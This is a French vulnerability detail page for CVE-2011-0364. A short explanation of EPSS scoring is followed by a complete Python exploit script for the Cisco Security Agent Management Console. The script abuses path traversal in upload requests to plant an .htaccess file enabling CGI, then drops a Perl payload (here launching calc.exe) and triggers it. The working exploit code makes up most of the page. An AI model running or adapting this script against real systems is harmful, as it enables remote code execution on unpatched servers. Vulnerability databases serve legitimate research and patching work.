CVE-2011-0364 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/env python # Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364) # gerry eisenhaur <gerry.eisenhaur _at_ gmail.com> import httplib import mimetools import StringIO _boundary = mimetools.choose_boundary() _host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB' _csamc = "192.168.0.108" # we need to enable some scripting to get command access htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee" perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n", backdoor = "exec \"calc.exe\";" def send_request(params=None): buf = StringIO.StringIO() headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary} for(key, value) in params.iteritems(): buf.write('--%s\r\n' % _boundary) buf.write('Content-Disposition: form-data; name="%s"' % key) buf.write('\r\n\r\n%s\r\n' % value) buf.write('--' + _boundary + '--\r\n\r\n') body = buf.getvalue() conn = httplib.HTTPSConnection(_csamc) conn.request("POST", "/csamc60/agent", body, headers) response = conn.getresponse() print response.status, response.reason conn.close() def main(): ### Build up required dir tree dirtree = ["../bin/webserver/htdocs/diag/bin", "../bin/webserver/htdocs/diag/bin/webserver", "../bin/webserver/htdocs/diag/bin/webserver/htdocs"] _params = { 'host_uid': _host_uid, 'jobname': None, 'host': "aa", 'diags': " ", 'diagsu': " ", 'profiler': " ", 'extension': "gee", } for path in dirtree: print "[+] Creating directory: %s" % path _params['jobname'] = path send_request(_params) ### Done building path, drop files print "[+] Dropping .htaccess" send_request({ 'host_uid': _host_uid, 'jobname': '', 'host': "/../bin/webserver/", 'diags': "", 'diagsu': "", 'profiler': htaccess, 'extension': "/../.htaccess", }) print "[+] Dropping payload" send_request({ 'host_uid': _host_uid, 'jobname': '', 'host': "/../bin/webserver/htdocs/gerry", 'diags': perl_path, 'diagsu': "", 'profiler': backdoor, 'extension': "/../exploit.gee", }) print "[+] Done, Executing dropped file." try: conn = httplib.HTTPSConnection(_csamc, timeout=1) conn.request("GET", "/csamc60/exploit.gee") response = conn.getresponse() print response.status, response.reason print response.read() except httplib.ssl.SSLError: pass print "[+] Finished." if __name__ == '__main__': main()